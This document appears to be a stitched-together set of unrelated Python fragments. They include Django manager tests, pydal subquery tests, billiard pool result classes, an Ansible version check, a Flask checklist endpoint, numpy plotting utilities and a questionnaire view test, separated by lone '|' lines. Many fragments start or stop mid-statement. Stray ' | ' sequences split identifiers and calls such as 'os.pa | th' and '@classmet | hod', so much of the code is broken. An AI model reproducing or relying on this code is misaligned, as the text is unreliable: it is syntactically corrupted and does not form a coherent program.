self.b1.authors.add(droopy)
# The fun manager ONLY clears fun peo | ple.
self.b1.authors(manager='fun_people').clear()
self.assertQuerysetEqual(
self.b1.authors(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.authors(manager='fun_people').all( | ), [
],
lambda c: c.first_name,
ordered=False,
)
def test_deconstruct_default(self):
mgr = models.Manager()
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertFalse(as_manager)
self.assertEqual(mgr_path, 'django.db.models.manager.Manager')
self.assertEqual(args, ())
self.assertEqual(kwargs, {})
def test_deconstruct_as_manager(self):
mgr = CustomQuerySet.as_manager()
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertTrue(as_manager)
self.assertEqual(qs_path, 'custom_managers.models.CustomQuerySet')
def test_deconstruct_from_queryset(self):
mgr = DeconstructibleCustomManager('a', 'b')
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertFalse(as_manager)
self.assertEqual(mgr_path, 'custom_managers.models.DeconstructibleCustomManager')
self.assertEqual(args, ('a', 'b',))
self.assertEqual(kwargs, {})
mgr = DeconstructibleCustomManager('x', 'y', c=3, d=4)
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertFalse(as_manager)
self.assertEqual(mgr_path, 'custom_managers.models.DeconstructibleCustomManager')
self.assertEqual(args, ('x', 'y',))
self.assertEqual(kwargs, {'c': 3, 'd': 4})
def test_deconstruct_from_queryset_failing(self):
mgr = CustomManager('arg')
msg = ("Could not find manager BaseCustomManagerFromCustomQuerySet in "
"django.db.models.manager.\n"
"Please note that you need to inherit from managers you "
"dynamically generated with 'from_queryset()'.")
with self.assertRaisesMessage(ValueError, msg):
mgr.deconstruct()
def test_abstract_model_with_custom_manager_name(self):
"""
A custom manager may be defined on an abstract model.
It will be inherited by the abstract model's children.
"""
PersonFromAbstract.abstract_persons.create(objects='Test')
self.assertQuerysetEqual(
PersonFromAbstract.abstract_persons.all(), ["Test"],
lambda c: c.objects,
)
class TestCars(TestCase):
def test_managers(self):
# Each model class gets a "_default_manager" attribute, which is a
# reference to the first manager defined in the class.
Car.cars.create(name="Corvette", mileage=21, top_speed=180)
Car.cars.create(name="Neon", mileage=31, top_speed=100)
self.assertQuerysetEqual(
Car._default_manager.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
self.assertQuerysetEqual(
Car.cars.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
# alternate manager
self.assertQuerysetEqual(
Car.fast_cars.all(), [
"Corvette",
],
lambda c: c.name
)
# explicit default manager
self.assertQuerysetEqual(
FastCarAsDefault.cars.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
self.assertQuerysetEqual(
FastCarAsDefault._default_manager.all(), [
"Corvette",
],
lambda c: c.name
)
# explicit base manager
self.assertQuerysetEqual(
FastCarAsBase.cars.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
self.assertQuerysetEqual(
FastCarAsBase._base_manager.all(), [
|
def hello | _world():
"Function that says hello."
print("Hello, world!")
| |
#!/usr/bin/env python
from runtest import | TestBase
class TestCase(TestBase):
def __init__(self):
TestBase.__init__(self, 'abc', """
# DURATION TID FUNCTION
62.202 us [28141] | __cxa_atexit();
[28141] | main() {
[28141] | a() {
[28141] | b() {
[28141] | c() {
0.753 us [28141] | getpid();
1.430 us [28141] | } /* c */
1.915 us [28141] | } /* b */
2.405 us [28141] | } /* a */
| 3.005 us [28141] | } /* main */
""")
|
# -*- coding: utf8 -*-
"""
The ``dbs`` module
===================
Contain all functions to access to main si | te db or any sql-lite db, in a secure way
"""
import sqlalchemy
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.au | tomap import automap_base
from sqlalchemy.sql import join
__all__ = ['join', 'create_engine_session', 'auto_map_orm']
def create_engine_session(engine_url, echo=True):
"""
Create a sql session
engine is the rfc1738 compliant url
http://docs.sqlalchemy.org/en/latest/dialects/index.html
:param engine_url:
:param echo:
:return:
"""
engine = sqlalchemy.create_engine(engine_url, echo=echo)
session_class = sessionmaker(bind=engine)
session = session_class()
return engine, session
def auto_map_orm(engine):
base_class = automap_base()
base_class.prepare(engine, reflect=True)
|
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible import __version__
from ansible.errors import AnsibleError
from distutils.version import LooseVersion
from operator import eq, ge, gt
from sys import version_info
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
version_requirement = '2.5 | .0.0'
version_tested_max = '2.7.5'
python3_required_version = '2.5.3'
if version_info[0] | == 3 and not ge(LooseVersion(__version__), LooseVersion(python3_required_version)):
raise AnsibleError(('Ansible >= {} is required when using Python 3.\n'
'Either downgrade to Python 2 or update your Ansible version to {}.').format(python3_required_version, python3_required_version))
if not ge(LooseVersion(__version__), LooseVersion(version_requirement)):
raise AnsibleError(('Trellis no longer supports Ansible {}.\n'
'Please upgrade to Ansible {} or higher.').format(__version__, version_requirement))
elif gt(LooseVersion(__version__), LooseVersion(version_tested_max)):
display.warning(u'You Ansible version is {} but this version of Trellis has only been tested for '
u'compatability with Ansible {} -> {}. It is advisable to check for Trellis updates or '
u'downgrade your Ansible version.'.format(__version__, version_requirement, version_tested_max))
if eq(LooseVersion(__version__), LooseVersion('2.5.0')):
display.warning(u'You Ansible version is {}. Consider upgrading your Ansible version to avoid '
u'erroneous warnings such as `Removed restricted key from module data...`'.format(__version__))
# Import BaseVarsPlugin after Ansible version check.
# Otherwise import error for Ansible versions older than 2.4 would prevent display of version check message.
from ansible.plugins.vars import BaseVarsPlugin
class VarsModule(BaseVarsPlugin):
def get_vars(self, loader, path, entities, cache=True):
return {}
|
from gasistafelice.rest.views.blocks.base import BlockWithList
from django.utils.translation import ugettext as _, ugettext_lazy as _lazy
#------------------------------------------------------------------------------#
# #
#------------------------------------------------------------------------------#
class Block(BlockWithList):
BLOCK_NAME = "account_state"
BLOCK_DESCRIPTION = _("Economic state")
BLOCK_VALID_RESOURCE_TYPES = ["gas", "site"]
def _get_resource_list(self, request):
return request.resource.accounts
# TODO fero CHECK
# THIS IS USEFUL FOR USER ACTIONS: add/update/delete
# # Calculate allowed user actions
# #
# user_actions = []
#
# if settings.CAN_CHANGE_CONFIGURATION_VIA_WEB == True:
# user = request.user
# if can_write_to_resource(user,res):
# if resource_type in ['container', 'node', 'target', 'measure']:
#
# if (resource_type in ['target', 'measure']):
# if res.suspended:
# user_actions.append('resume')
# else:
# user_actions.append('suspend')
# else:
# user_actions.append('resume')
# user_actions.append('suspend')
# TODO fero CHECK
# THIS IS USEFUL FOR ADD/REMOVE NEW GAS
# elif args == "new_note":
# return self.add_new_note(request, resource_type, resource_id)
# elif args == "remove_note":
# return self.remove_note(request, resource_type, resource_id)
#------------------------------------------------------------------------- | -----#
# #
#------------------------------------------------------------------------------#
# TODO fero CHECK
# THIS IS USEFUL FOR ADD/REMOVE NEW GAS
# def add_new_note(self,request, resource_type, resource_id):
# resource = request.resource
#
# if request.POST:
#
# | #title = request.REQUEST.get('title');
# body = request.REQUEST.get('body');
#
# new_comment = Comment(content_object = resource
# ,site = DjangoSite.objects.all()[0]
# ,user = request.user
# ,user_name = request.user.username
# ,user_email = request.user.email
# ,user_url = ''
# ,comment = body
# ,ip_address = None
# ,is_public = True
# ,is_removed = False
# )
#
# new_comment.save()
#
# return HttpResponse('<div id="response" resource_type="%s" resource_id="%s" class="success">ok</div>' % (resource.resource_type, resource.id))
#
# return HttpResponse('')
#
# #------------------------------------------------------------------------------#
# # #
# #------------------------------------------------------------------------------#
#
# def remove_note(self, request, resource_type, resource_id):
#
# resource = request.resource
#
# note_id = request.REQUEST.get('note_id')
#
# note = Comment.objects.get(id=note_id)
# note.delete()
#
# return HttpResponse('<div id="response" resource_type="%s" resource_id="%s" class="success">ok</div>' % (resource.resource_type, resource.id))
|
import unittest
import os
from test.aiml_tests.client import TestClient
from programy.config.brain import BrainFileConfiguration
class BasicTestClient(TestClient):
def __init__(self):
TestClient.__init__(self)
def load_configuration(self, arguments):
super(BasicTestClient, self).load_configuration(arguments)
self.configuration.brain_configuration._aiml_files = BrainFileConfiguration(files=os.pa | th.dirname(__file__))
self.configuration.brain_configuration._person = os.path.dirname(__file__)+"/person.txt"
class PersonAIMLTests(unittest.TestCase):
@classmet | hod
def setUpClass(cls):
PersonAIMLTests.test_client = BasicTestClient()
def test_person(self):
response = PersonAIMLTests.test_client.bot.ask_question("test", "TEST PERSON")
self.assertIsNotNone(response)
self.assertEqual(response, "This is your2 cat")
|
#!/usr/bin/python
########################################################################
# 1 August | 2014
# Patrick Lombard, Centre for Stem Stem Research
# Core Bioinformatics Group
# University of Cambridge
# All right reserve | d.
########################################################################
import pychiptools.call_diff_bind
pychiptools.call_diff_bind.main()
|
from flask import request
from flask_restplus import Resource
from skf.api.security import security_headers, validate_privilege
from skf.api.checklist_category.business import update_checklist_category
from skf.api.checklist_category.serializers import checklist_type_update, message
from skf.api.kb.parsers import authorization
from skf.api.restplus import api
from skf.api.security i | mport log, val_num, val_alpha, val_alpha_num, val_alpha_num_special
ns = api.namespace('checklist_category', description='Operations related to checklist items')
@ns.route('/update/<int:id>')
@api.doc(params={'id': 'The checklist category id'})
@api.response(404, 'Validation error', message)
class ChecklistCategoryUpdate(Resource):
@api.expect(authorization, checklist_type_update)
@api.response(400, 'No results found', message)
def put(self, id):
"""
Update a | checklist type.
* Privileges required: **edit**
"""
data = request.json
val_num(id)
val_alpha_num_special(data.get('name'))
val_alpha_num_special(data.get('description'))
validate_privilege(self, 'edit')
result = update_checklist_category(id, data)
return result, 200, security_headers()
|
)`
#
class ApplyResult(object):
_worker_lost = None
_write_to = None
_scheduled_for = None
def __init__(self, cache, callback, accept_callback=None,
timeout_callback=None, error_callback=None, soft_timeout=None,
timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT,
on_timeout_set=None, on_timeout_cancel=None,
callbacks_propagate=(), send_ack=None,
correlation_id=None):
self.correlation_id = correlation_id
self._mutex = Lock()
self._event = threading.Event()
self._job = next(job_counter)
self._cache = cache
self._callback = callback
self._accept_callback = accept_callback
self._error_callback = error_callback
self._timeout_callback = timeout_callback
self._timeout = timeout
self._soft_timeout = soft_timeout
self._lost_worker_timeout = lost_worker_timeout
self._on_timeout_set = on_timeout_set
self._on_timeout_cancel = on_timeout_cancel
self._callbacks_propagate = callbacks_propagate or ()
self._send_ack = send_ack
self._accepted = False
self._cancelled = False
self._worker_pid = None
self._time_accepted = None
self._terminated = None
cache[self._job] = self
def __repr__(self):
return '<Result: {id} ack:{ack} ready:{ready}>'.format(
id=self._job, ack=self._accepted, ready=self.ready(),
)
def ready(self):
return self._event.isSet()
def accepted(self):
return self._accepted
def successful(self):
assert self.ready()
return self._success
def _cancel(self):
"""Only works if synack is used."""
self._cancelled = True
def discard(self):
self._cache.pop(self._job, None)
def terminate(self, signum):
self._terminated = signum
def _set_terminated(self, signum=None):
try:
raise Terminated(-(signum or 0))
except Terminated:
self._set(None, (False, ExceptionInfo()))
def worker_pids(self):
return [self._worker_pid] if self._worker_pid else []
def wait(self, timeout=None):
self._event.wait(timeout)
def get(self, timeout=None):
self.wait(timeout)
if not self.ready():
raise TimeoutError
if self._success:
return self._value
else:
raise self._value.exception
def safe_apply_callback(self, fun, *args, **kwargs):
if fun:
try:
fun(*args, **kwargs)
except self._callbacks_propagate:
raise
except Exception as exc:
error('Pool callback raised exception: %r', exc,
exc_info=1)
def handle_timeout(self, soft=False):
if self._timeout_callback is not None:
self.safe_apply_callback(
self._timeout_callback, soft=soft,
timeout=self._soft_timeout if soft else self._timeout,
)
def _set(self, i, obj):
with self._mutex:
if self._on_timeout_cancel:
self._on_timeout_cancel(self)
self._success, self._value = obj
self._event.set()
if self._accepted:
# if not accepted yet, then the set message
# was received before the ack, which means
# the ack will remove the entry.
self._cache.pop(self._job, None)
# apply callbacks last
if self._callback and self._success:
self.safe_apply_callback(
self._callback, self._value)
if (self._value is not None and
self._error_callback and not self._success):
self.safe_apply_callback(
self._error_callback, self._value)
def _ack(self, i, time_accepted, pid, synqW_fd):
with self._mutex:
if self._cancelled and self._send_ack:
self._accepted = True
if synqW_fd:
return self._send_ack(NACK, pid, self._job, synqW_fd)
return
self._accepted = True
self._time_accepted = time_accepted
self._worker_pid = pid
if self.ready():
# ack received after set()
self._cache.pop(self._job, None)
if self._on_timeout_set:
self._on_timeout_set(self, self._soft_timeout, self._timeout)
response = ACK
if self._accept_callback:
try:
self._accept_callback(pid, time_accepted)
except self._propagate_errors:
response = NACK
raise
except Exception:
response = NACK
# ignore other errors
finally:
if self._send_ack and synqW_fd:
return self._send_ack(
response, pid, self._job, synqW_fd
)
if self._send_ack and synqW_fd:
self._send_ack(response, pid, self._job, synqW_fd)
#
# Class whose instances are returned by `Pool.map_async()`
#
class MapResult(ApplyResult):
def __init__(self, cache, chunksize, length, callback, error_callback):
ApplyResult.__init__(
self, cache, callback, error_callback=error_callback,
)
self._success = True
self._length = length
self._value = [None] * length
self._accepted = [False] * length
self._worker_pid = [None] * length
self._time_accepted = [None] * length
self._chunksize = chunksize
if chunksize <= 0:
self._number_left = 0
self._event.set()
del cache[self._job]
else:
self._number_left = length // chunksize + bool(length % chunksize)
def _set(self, i, success_result):
success, result = success_result
if success:
self._value[i * self._chunksize:(i + 1) * self._chunksize] = result
self._number_left -= 1
if self._number_left == 0:
if self._callback:
self._callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
else:
self._success = False
self._value = result
if self._error_callback:
self._error_callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
def _ack(self, i, time_accepted, pid, *args):
start = i * self._chunksize
stop = min((i + 1) * self._chunksize, self._length)
for j in range(start, stop):
self._accepted[j] = True
self._worker_pid[j] = pid
self._time_accepted[j] = time_accepted
if self.ready():
self._cache.pop(self._job, None)
def accepted(self):
return all(self._accepted)
def worker_pids(self):
return [pid for pid in self._worker_pid if pid]
#
# Class whose instances are returned by `Pool.imap()`
#
class IMapIterator(object):
_worker_lost = None
def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT):
self._cond = threading.Condition(threading.Lock())
| self._job = next(job_counter)
self._cache = cache
self._items = deque()
self._ | index = 0
self._length = None
self._ready = False
self._unsorted = {}
self._worker_pids = []
self._lost_worker_timeout = lost_worker_timeout
cache[self._job] = self
def __iter__(self):
return self
def next(self, timeout=None):
with self._cond:
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
|
# coding: utf-8
# numpy_utils for Intro to Data Science with Python
# Author: Kat Chuang
# Created: Nov 2014
# --------------------------------------
import numpy
## Stage 2 begin
fieldNames = ['', 'id', 'priceLabel', 'name','brandId', 'brandName', 'imageLink',
'desc', 'vendor', 'patterned', 'material']
dataTypes = [('myint', 'i'), ('myid', 'i'), ('price', 'f8'), ('name', 'a200'),
('brandId', '<i8'), ('brandName', 'a200'), ('imageUrl', '|S500'),
('description', '|S900'), ('vendor', '|S100'), ('pattern', '|S50'), ('material', '|S50'), ]
def load_data(filename):
my_csv = numpy.genfromtxt(filename, delimiter='\t', skip_header=1,
names=fieldNames, invalid_raise=False,
dtype=dataTypes)
return my_csv
#2.a count
def size(my_csv):
print("Length (numpy): {}".format(my_csv.size))
#2.b sum
def calculate_numpy_sum(my_field):
field_in_float = [float(item) for item in my_field]
total = numpy.sum(field_in_float)
return total
#2.c mean
def find_numpy_average(my_field):
field_in_float = [float(item) for item in my_field]
total = calculate_numpy_sum(field_in_float)
size = len(my_field)
average = total / size
return average
#2.d max, min
def numpy_max(my_field_in_float):
return numpy.amax(my_field_in_float)
def numpy_min(my_field_in_float):
return numpy.amin(my_field_in_float)
## Stage 2 end
# --------------------------------------
## Stage 3 begin
from my_utils import filter_col_by_string, filter_col_by_float
## Stage 3 end
# --------------------------------------
## Stage 4 begin
from my_utils import write_to_file, write_brand_and_price_to_file
## Stage 4 end
# --------------------------------------
## Stage 5 begin
import matplotlib.pyplot as plt
plt.st | yle.use('ggplot')
def plot_all_bars(prices_in_float, exported_figure_filename):
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
| prices = list(map(int, prices_in_float))
X = numpy.arange(len(prices))
width = 0.25
ax.bar(X+width, prices, width)
ax.set_xlim([0, 5055])
fig.savefig(exported_figure_filename)
def create_chart_for_embed(sample, title):
prices = sorted(map(int, sample))
x_axis_ticks = list( range(len(sample)) )
plt.plot(x_axis_ticks, prices, 'g', label='price points', linewidth=2)
def export_chart(sample, title):
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
prices = sorted(map(int, sample))
x_axis_ticks = list( range(len(sample)) )
ax.plot(x_axis_ticks, prices, 'g', label='price points', linewidth=2)
ax.set_title(title)
ax.set_xlabel(title)
ax.set_ylabel('Number of Ties')
if len(prices) > 20:
ax.set_xlim([0, round(len(prices), -1)])
else:
ax.set_xlim([0, len(prices)])
fig.savefig('_charts/' + title + '.png')
def prices_of_list(sampleData):
temp_list = []
for row in sampleData[1:]:
priceCol = float(row[2])
temp_list.append(priceCol)
return temp_list
## Stage 5 end
# --------------------------------------
## Stage 6 begin
## Stage 6 end
# --------------------------------------
|
[dict(aa=1), dict(aa=3)])
def testCorrelated(self):
db = self.connect()
db.define_table(
"t1", Field("aa", "integer"), Field("bb"), Field("mark", "integer")
)
db.define_table("t2", Field("aa", "integer"), Field("cc"))
db.define_table("t3", Field("aa", "integer"))
data_t1 = [
dict(aa=1, bb="bar"),
dict(aa=1, bb="foo"),
dict(aa=2, bb="foo"),
dict(aa=2, bb="test"),
dict(aa=3, bb="baz"),
dict(aa=3, bb="foo"),
]
data_t2 = [dict(aa=1, cc="foo"), dict(aa=2, cc="bar"), dict(aa=3, cc="baz")]
expected_cor = [(1, "foo"), (3, "baz")]
expected_leftcor = [(1, "foo"), (2, None), (3, "baz")]
expected_uncor = [(1, "bar"), (1, "foo"), (2, "foo"), (3, "baz"), (3, "foo")]
for item in data_t1:
db.t1.insert(**item)
for item in data_t2:
db.t2.insert(**item)
db.t3.insert(aa=item["aa"])
# Correlated subqueries
subquery = db.t1.aa == db.t2.aa
subfields = [db.t2.cc]
sub = db(subquery).nested_select(*subfields).with_alias("sub")
query = db.t1.bb.belongs(sub)
order = db.t1.aa | db.t1.bb
result = db(query).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
join = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
order = db.t3.aa | db.t1.bb
result = db(db.t3).select(db.t3.aa, db.t1.bb, join=join, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
left = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
result = db(db.t3).select(db.t3.aa, db.t1.bb, left=left, orderby=order)
self.assertEqual(len(result), len(expected_leftcor))
for idx, val in enumerate(expected_leftcor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
order = db.t1.aa | db.t1.bb
db(db.t1.bb.belongs(sub)).update(mark=1)
result = db(db.t1.mark == 1).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
db(~db.t1.bb.belongs(sub)).delete()
result = db(db.t1.id > 0).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
db(db.t1.id > 0).delete()
for item in data_t1:
db.t1.insert(**item)
# Uncorrelated subqueries
kwargs = dict(correlated=False)
sub = db(subquery).nested_select(*subfields, **kwargs)
query = db.t1.bb.belongs(sub)
order = db.t1.aa | db.t1.bb
result = db(query).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
join = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
order = db.t3.aa | db.t1.bb
result = db(db.t3).select(db.t3.aa, db.t1.bb, join=join, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
left = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
result = db(db.t3).select(db.t3.aa, db.t1.bb, left=left, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
# MySQL does not support subqueries with uncorrelated references
# to target table
# Correlation prevented by alias in parent select
tmp = db.t1.with_alias("tmp")
sub = db(subquery).nested_select(*subfields)
query = tmp.bb.belongs(sub)
order = tmp.aa | tmp.bb
result = db(query).select(tmp.aa, tmp.bb, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
join = [tmp.on((db.t3.aa == tmp.aa) & tmp.bb.belongs(sub))]
order = db.t3.aa | tmp.bb
result = db(db.t3).select(db.t3.aa, tmp.bb, join=join, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["tmp"]["bb"], val[1])
left = [tmp.on((db.t3.aa == tmp.aa) & tmp.bb.belongs(sub))]
result = db(db.t3).select(db.t3.aa, tmp.bb, left=left, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual | (result[idx]["tmp"]["bb"], val[1])
# SQLite does not support aliasing target table in UPDATE/DELETE
# MyS | QL does not support subqueries with uncorrelated references
# to target table
class TestAddMethod(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa"))
@db.tt.add_method.all
def select_all(table, orderby=None):
return table._db(table).select(orderby=orderby)
self.assertEqual(db.tt.insert(aa="1"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa="1"), 2)
self.assertEqual(db.tt.insert(aa="1"), 3)
else:
self.assertEqual(db.tt.insert(aa="1"), 1)
self.assertEqual(db.tt.insert(aa="1"), 1)
self.assertEqual(len(db.tt.all()), 3)
class TestBelongs(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa"))
self.assertEqual(db.tt.insert(aa="1"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa="2"), 2)
self.assertEqual(db.tt.insert(aa="3"), 3)
else:
self.assertEqual(db.tt.insert(aa="2"), 1)
self.assertEqual(db.tt.insert(aa="3"), 1)
self.assertEqual(db(db.tt.aa.belongs(("1", "3"))).count(), 2)
self.assertEqual(
db(db.tt.aa.belongs(db(db.tt.id > 2)._select(db.tt.aa))).count(), 1
)
self.assertEqual(
db(
db.tt.aa.belongs(db(db.tt.aa.belongs(("1", "3")))._select(db.tt.aa))
).count(),
2,
)
self.assertEqual(
db(
db.tt.aa.belongs(
db(
db.tt.aa.belongs(
db(db.tt.aa.belongs(("1", "3")))._select(db.tt.aa)
)
)._select(db.tt.aa)
)
).count(),
2,
)
class TestContains(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa", "list:string"), Field("bb", "string"))
self.assertEqual(db.tt.insert(aa=["aaa", "bbb"], bb="aaa"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa=["bbb", "ddd"], bb="abb"), 2)
self. |
"""Placeholder."""
import numpy as np
def rgb_to_hsi(im):
"""Convert to HSI the RGB pixels in im.
Adapted from
https://en.w | ikipedia.org/wiki/HSL_and_HSV#Hue_and_chroma.
"""
im = np.moveaxis(im, -1, 0)
if len(im) not in (3, 4):
raise ValueError("Expected 3-channel RGB or 4-channel RGBA image;"
" received a {}-channel image".format(len(im)))
im = im[:3]
hues = (np.arctan2(3**0.5 * (im[1] - im[2]),
2 * im[0] - im[1] - im[2]) / (2 * np.pi)) % 1
intensities = | im.mean(0)
saturations = np.where(
intensities, 1 - im.min(0) / np.maximum(intensities, 1e-10), 0)
return np.stack([hues, saturations, intensities], -1)
|
import LNdigitalIO
def switch_pressed(event):
event.chip.output_pins[event.pin_num].turn_on()
def switch_unpressed(event):
event.chip.output_pins[e | vent.pin_num].turn_off()
if __name__ == "__main__":
LNdigital = LNdigitalIO.LNdigitals()
listener = LNdigitalIO.InputEventListener(chip=LNdigital)
for i in range(4):
listener.register(i, LN | digitalIO.IODIR_ON, switch_pressed)
listener.register(i, LNdigitalIO.IODIR_OFF, switch_unpressed)
listener.activate()
|
leFactory
class AssignQuestionViewTest(BaseTest):
def setUp(self):
self.client = Client()
self.user = self.create_user(org="WHO")
self.region = None
self.assign('can_edit_questionnaire', self.user)
self.client.login(username=self.user.username, password='pass')
self.questionnaire = Questionnaire.objects.create(name="JRF 2013 Core English", year=2013, region=self.region)
self.section = Section.objects.create(name="section", questionnaire=self.questionnaire, order=1)
self.subsection = SubSection.objects.create(title="subsection 1", section=self.section, order=1)
self.question1 = Question.objects.create(text='Q1', UID='C00003', answer_type='Number', region=self.region)
self.question2 = Question.objects.create(text='Q2', UID='C00002', answer_type='Number', region=self.region)
self.form_data = {'questions': [self.question1.id, self.question2.id]}
self.url = '/subsection/%d/assign_questions/' % self.subsection.id
def test_get_assign_question_page(self):
response = self.client.get(self.url)
self.assertEqual(200, response.status_code)
templates = [template.name for template in response.templates]
self.assertIn('questionnaires/assign_questions.html', templates)
def test_gets_assign_questions_form_and_subsection_in_context(self):
afro = Region.objects.create(name="Afro")
question_in_region = Question.objects.create(text='not in Region Q', UID='C000R3', answer_type='Number',
region=afro)
response = self.client.get(self.url)
self.assertIsInstance(response.context['assign_question_form'], AssignQuestionForm)
self.assertEqual(2, response.context['questions'].count())
questions_texts = [question.text for question in list(response.context['questions'])]
self.assertIn(self.question1.text, questions_texts)
self.assertIn(self.question2.text, questions_texts)
self.assertNotIn(question_in_region.text, questions_texts)
self.assertEqual('Done', response.context['btn_label'])
def test_GET_puts_list_of_already_used_questions_in_context(self):
question1 = Question.objects.create(text='USed question', UID='C00033', answer_type='Number',
region=self.region)
question1.question_group.create(subsection=self.subsection)
response = self.client.get(self.url)
self.assertEqual(1, len(response.context['active_questions']))
self.assertIn(question1, response.context['active_questions'])
self.assertIn(question1, response.context['questions'])
def test_GET_does_not_put_parent_questions_in_the_context(self):
parent_question = Question.objects.create(text='parent q', UID='C000R3', answer_type='Number')
self.question1.parent = parent_question
self.question1.save()
used_question1 = Question.objects.create(text='USed question', UID='C00033', answer_type='Number',
region=self.region, parent=parent_question)
used_question1.question_group.create(subsection=self.subsection)
response = self.client.get(self.url)
self.assertEqual(3, response.context['questions'].count())
questions_texts = [question.text for question in list(response.context['questions'])]
self.assertIn(self.question1.text, questions_texts)
self.assertIn(self.question2.text, questions_texts)
self.assertIn(used_question1.text, questions_texts)
self.assertNotIn(parent_question.text, questions_texts)
self.assertEqual(1, len(response.context['active_questions']))
self.assertIn(used_question1, response.context['active_questions'])
def test_post_questions_assigns_them_to_subsections_and_get_or_create_group(self):
self.failIf(self.question1.question_group.all())
self.failIf(self.question2.question_group.all())
meta = {'HTTP_REFERER': self.url}
response = self.client.post(self.url, data={'questions': [self.question1.id, self.question2.id]}, **meta)
question_group = self.question1.question_group.all()
self.assertEqual(1, question_group.count())
self.assertEqual(question_group[0], self.question2.question_group.all()[0])
self.assertEqual(self.subsection, question_group[0].subsection)
def test_successful_post_redirect_to_referer_url(self):
meta = {'HTTP_REFERER': self.url}
response = self.client.post(self.url, data={'questions': [self.question1.id, self.question2.id]}, **meta)
self.assertRedirects(response, self.url)
def test_successful_post_display_success_message(self):
referer_url = '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)
meta = {'HTTP_REFERER': referer_url}
response = self.client.post(self.url, data={'questions': [self.question1.id, self.question2.id]}, **meta)
message = "Questions successfully assigned to questionnaire."
self.assertIn(message, response.cookies['messages'].value)
def test_with_errors_returns_the_form_with_error(self):
referer_url = '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)
meta = {'HTTP_REFERER': referer_url}
response = self.client.post(self.url, data={'questions': []}, **meta)
self.assertIsInstance(response.context['assign_question_form'], AssignQuestionForm)
self.assertIn("This field is required.", response.context['assign_question_form'].errors['questions'])
self.assertEqual(2, response.context['questions'].count())
questions_texts = [question.text for question in list(response.context['questions'])]
self.assertIn(self.question1.text, questions_texts)
self.assertIn(self.question2.text, questions_texts)
self.assertEqual('Done', response.context['btn_label'])
def test_login_required(self):
self.assert_login_required(self.url)
def test_permission_required_for_create_section(self):
self.assert_permission_required(self.url)
user_not_in_same_region = self.create_user(username="asian_chic", group=self.REGIONAL_ADMIN | , region="ASEAN",
org="WHO")
self.assign('can_edit_questionnaire', user_not_in_same_region)
self.client.logout()
self.client.login(username='asian_chic', password='pass')
response = self.client.get(self.url)
